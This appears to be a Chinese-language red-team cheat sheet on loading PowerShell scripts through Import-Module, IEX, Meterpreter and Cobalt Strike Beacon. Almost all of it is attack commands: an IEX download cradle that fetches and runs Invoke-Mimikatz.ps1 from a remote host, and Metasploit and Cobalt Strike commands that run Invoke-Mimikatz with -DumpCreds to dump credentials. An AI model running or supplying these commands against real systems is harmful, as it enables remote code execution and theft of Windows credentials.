加载 PowerShell 脚本

通过 Module, IEX, Metasploit, Cobalt Strike 方式加载 PowerShell 脚本

Table of contents

Module

通过导入模块的方式加载 PowerShell 脚本.

Import-Module .\Invoke-Mimikatz.ps1

. .\Invoke-Mimikatz.ps1

IEX

通过 Invoke-Expression 命令从网络加载 PowerShell 脚本.

IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.1/Invoke-Mimikatz.ps1')

Metasploit

通过 Meterpreter 中的 powershell 模块加载 PowerShell 脚本.

load powershell
powershell_import /home/exp10it/Invoke-Mimikatz.ps1
powershell_execute Invoke-Mimikatz -DumpCreds

Cobalt Strike

通过 Beacon 命令控制台加载 PowerShell 脚本.

powershell-import /home/exp10it/Invoke-Mimikatz.ps1
powershell-execute Invoke-Mimikatz -DumpCreds

注意

PowerShell 默认限制输出长度, 需手动更改.

$FormatEnumerationLimit = -1